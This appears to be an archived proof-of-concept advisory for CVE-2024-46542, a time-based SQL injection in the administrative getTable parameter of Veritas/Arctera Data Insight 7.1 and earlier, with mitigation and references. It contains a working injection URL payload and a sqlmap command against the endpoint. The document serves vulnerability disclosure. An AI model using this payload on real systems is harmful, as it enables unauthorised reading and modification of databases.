关联漏洞
介绍
# CVE-2024-46542
**Severity :** **Medium** (**6.5**)
**CVSS score :** `CVSS v3.1 Base Score 6.5 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)`
## Summary :
A vulnerability was discovered in Veritas / Arctera Data Insight versions **7.1**, and prior. The vulnerability allows an attacker to modify the syntax of a **SQL query** in one of the **administrative features** of the application.
## Poc
### Steps to Reproduce :
1. Log in with admin rights.
2. Perform the time based sql injection in the getTable parameter:
```html
https://<ip>/data?getTable=info)+WHERE+8943=8943+AND+4718=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--+veJY&db=_report&repid=77&page=1
```
Alternatively sqlmap can be used:
```html
sqlmap -u "https://<ip>/data?getTable=info&db=_report&repid=77&page=1" -p getTable --dbms sqlite --risk 3 --level 5
```
## Affected Version Details :
- <= 7.1
## Impact :
This may result in the attacker being able to submit arbitrary SQL commands on the back-end database to create, read, update, or delete data stored in the database.
## Mitigation :
- Upgrade to Data Insight version 7.1.1
## References :
- https://www.veritas.com/support/en_US/security/ARC24-001
- https://nvd.nist.gov/vuln/detail/CVE-2024-46542
文件快照
[4.0K] /data/pocs/4414b2d6a01d81edcad5caee8658429d18685e11
└── [1.2K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。